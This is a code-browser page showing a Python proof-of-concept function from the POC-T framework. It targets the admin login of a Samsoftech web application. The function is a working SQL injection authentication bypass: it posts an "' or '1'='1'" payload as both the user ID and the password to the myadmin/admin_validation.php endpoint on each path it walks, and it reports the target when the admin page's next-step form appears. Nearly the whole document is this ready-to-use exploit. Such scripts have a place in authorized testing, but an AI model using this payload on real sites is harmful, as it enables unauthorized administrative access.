MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/samsoftech-admin-bypass.py:23–38  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

21
22
23def poc(url):
24 if '://' not in url:
25 url = 'http://' + url
26 payload = "' or '1'='1' -- ' ~ ' or '1'='1'"
27 data = {'userid': payload, 'userpass': payload, 'submit': 'Enter'}
28 for each in iterate_path(url):
29 if '?' in each:
30 continue
31 target = each.rstrip('/') + '/myadmin/admin_validation.php'
32 try:
33 r = requests.post(target, data=data, timeout=15)
34 if 'form name="frmNextstep"' in r.content:
35 return target
36 except Exception:
37 pass
38 return False

Callers

nothing calls this directly

Calls 1

iterate_pathFunction · 0.90

Tested by

no test coverage detected